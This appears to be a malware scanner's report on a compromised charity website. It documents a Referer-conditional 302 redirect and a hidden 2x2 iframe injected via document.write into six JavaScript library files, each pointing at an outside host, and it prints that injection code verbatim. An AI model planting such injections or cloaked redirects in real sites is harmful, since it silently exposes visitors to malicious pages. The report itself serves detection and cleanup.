Malicious/Suspicious Redirects
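URL: http://sriroyalfoundation.com/ (imitation of visitor from search engine)
Request:
GET / HTTP/1.1
Host: sriroyalfoundation.com
Referer: http://www.google.com/search?q=redirect+check1
Server response:
HTTP/1.1 302 Found
Connection: close
Date: Tue, 16 Sep 2014 02:42:23 GMT
Location: http://recruitingpartners.com/hehd.html?h=592695
Server: Apache/2.2.27 (Unix) mod_ssl/2.2.27 OpenSSL/0.9.8e-fips-rhel5 mod_jk/1.2.37 mod_bwlimited/1.4
Content-Length: 391
Content-Type: text/html; charset=iso-8859-1
Status: malicious
Note: this 302 was returned to a request carrying a search-engine Referer, whereas the same URL listed under "Scanned pages/files" returned 200 OK and was marked clean. That difference suggests the redirect is conditional on the Referer, so an owner who opens the site directly may never see it. On Apache such rules are commonly placed in .htaccess or in server-side code, neither of which this report shows.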
Scanned pages/files
Request | Server response | Status |
http://sriroyalfoundation.com/ | 200 OK Content-Length: 11475 Content-Type: text/html | clean |
http://sriroyalfoundation.com/js/jquery-1.7.1.min.js | 200 OK Content-Length: 94034 Content-Type: application/javascript | malicious |
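Malicious code - confirmed by antiviruses (see below):
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://recruitingpartners.com/hehd.html?j=592695></iframe>');
Surrounding file content (excerpt as shown by the scanner, truncated):
(function(a,b){function cy(a){return f.isWindow(a)?a:a.nodeType===9?a.defaultView||a.parentWindow:!1}function cv(a){if(!ck[a]){var b=c.body,d=f("<"+a+">").appendTo(b),e=d.css("display");d.remove();if(e==="none"||e===""){cl||(cl=c.createElement("iframe"),cl.frameBorder=cl.width=cl.height=0),b.appendChild(cl)
Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://recruitingpartners.com/hehd.html?j=592695 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://recruitingpartners.com/hehd.html?j=592695>
Note: the same one-line document.write injection is reported for every file marked malicious on this page. It points at one of two hosts (recruitingpartners.com or candice-accola.org) and carries the same query value 592695 as the redirect above. In each case it is shown ahead of the library's own code, so comparing a flagged file against the upstream release of that library is a direct way to confirm what was added.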
http://sriroyalfoundation.com/js/jquery.nivo.slider.pack.js | 200 OK Content-Length: 11712 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below):
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://candice-accola.org/mocf.html?j=592695></iframe>');
Surrounding file content (excerpt as shown by the scanner, truncated):
(function(a){var b=function(b,c){var d=a.extend({},a.fn.nivoSlider.defaults,c);var e={currentSlide:0,currentImage:"",totalSlides:0,running:false,paused:false,stop:false};var f=a(b);f.data("nivo:vars",e);f.css("position","relative");f.addClass("nivoSlider");var g=f.children();g.each(function(){var b=a(this);var c="";i
Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://candice-accola.org/mocf.html?j=592695 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://candice-accola.org/mocf.html?j=592695>
http://pagead2.googlesyndication.com/pagead/show_ads.js | 200 OK Content-Length: 21394 Content-Type: text/javascript | clean |
http://sriroyalfoundation.com/index.html | 200 OK Content-Length: 11475 Content-Type: text/html | clean |
http://sriroyalfoundation.com/aboutus.html | 200 OK Content-Length: 8852 Content-Type: text/html | clean |
http://sriroyalfoundation.com/projects.html | 200 OK Content-Length: 18482 Content-Type: text/html | clean |
http://sriroyalfoundation.com/js/prototype.js | 200 OK Content-Length: 163312 Content-Type: application/javascript | clean |
http://sriroyalfoundation.com/js/scriptaculous.js?load=effects,builder | 200 OK Content-Length: 3097 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below):
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://recruitingpartners.com/hehd.html?j=592695></iframe>');
Surrounding file content (excerpt as shown by the scanner, truncated):
var Scriptaculous = { Version: '1.9.0', require: function(libraryName) { try{ document.write('<script type="text/javascript" src="'+libraryName+'"><\/script>'); } catch(e) { var script = document.createElement('script'); script.type var js = /scriptaculous\.js(\?.*)?$/; $$('script[src]').findAll(function(s) { return s.src.match(js); }).each(function(s) { var path = s.src.replace(js, ''), includes = s.src.match(/\?.*load=([a-z,]*)/); (includes ? includes[1] : 'builder,effects,dragdrop,controls,slider,sound').split(',').each( function(include) { Scriptaculous.require(path+include+'.js') }); }); } }; Scriptaculous.load();
Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://recruitingpartners.com/hehd.html?j=592695 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://recruitingpartners.com/hehd.html?j=592695>
http://sriroyalfoundation.com/js/lightbox.js | 200 OK Content-Length: 18674 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below):
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://candice-accola.org/mocf.html?j=592695></iframe>');
Surrounding file content (excerpt as shown by the scanner, truncated):
LightboxOptions = Object.extend({ fileLoadingImage: 'images/loading.gif', fileBottomNavCloseImage: 'images/closelabel.gif', overlayOpacity: 0.8, animate: true, resizeSpeed: 7, borderSize: 10, labelImage: "Image", labelOf: windowHeight = document.body.clientHeight; } if(yScroll < windowHeight){ pageHeight = windowHeight; } else { pageHeight = yScroll; } if(xScroll < windowWidth){ pageWidth = xScroll; } else { pageWidth = windowWidth; } return [pageWidth,pageHeight]; } } document.observe('dom:loaded', function () { new Lightbox(); });
Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://candice-accola.org/mocf.html?j=592695 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://candice-accola.org/mocf.html?j=592695>
http://sriroyalfoundation.com/photo.html | 200 OK Content-Length: 7677 Content-Type: text/html | clean |
http://sriroyalfoundation.com/contactus.php | 200 OK Content-Length: 12365 Content-Type: text/html | clean |
https://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.js | 200 OK Content-Length: 183184 Content-Type: text/javascript | clean |
http://sriroyalfoundation.com/js/jquery.validationEngine-en.js | 200 OK Content-Length: 6358 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below):
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://recruitingpartners.com/hehd.html?j=592695></iframe>');
Surrounding file content (excerpt as shown by the scanner, truncated):
(function($){ $.fn.validationEngineLanguage = function(){ }; $.validationEngineLanguage = { newLang: function(){ $.validationEngineLanguage.allRules = { "required": { "regex": "none", "alertText": " "alertText": "* This name is already taken", "alertTextLoad": "* Validating, please wait" }, "validate2fields": { "alertText": "* Please input HELLO" } }; } }; $.validationEngineLanguage.newLang(); })(jQuery);
Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://recruitingpartners.com/hehd.html?j=592695 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://recruitingpartners.com/hehd.html?j=592695>
http://sriroyalfoundation.com/js/jquery.validationEngine.js | 200 OK Content-Length: 47260 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below):
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://recruitingpartners.com/hehd.html?j=592695></iframe>');
Surrounding file content (excerpt as shown by the scanner, truncated):
(function($) { var methods = { init: function(options) { var form = this; if (!form.data('jqv') || form.data('jqv') == null ) { methods._saveOptions(form, options); $(".formError").live("click" methods.init.apply(form); return methods[method].apply(form, Array.prototype.slice.call(arguments, 1)); } else if (typeof method == 'object' || !method) { methods.init.apply(form, arguments); return methods.attach.apply(form); } else { $.error('Method ' + method + ' does not exist in jQuery.validationEngine'); } }; })(jQuery);
Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://recruitingpartners.com/hehd.html?j=592695 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://recruitingpartners.com/hehd.html?j=592695>
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=sriroyalfoundation.com
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://sriroyalfoundation.com/
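Result: sriroyalfoundation.com is not infected or malware details are not published yet.
Note: neither blacklist flagged the site at the time of these queries, even though the scan above reports a malicious redirect and injected iframes in six JavaScript files. A blacklist lookup reflects only what that service has already crawled and classified, so an unlisted result should not be read as evidence that the site is clean.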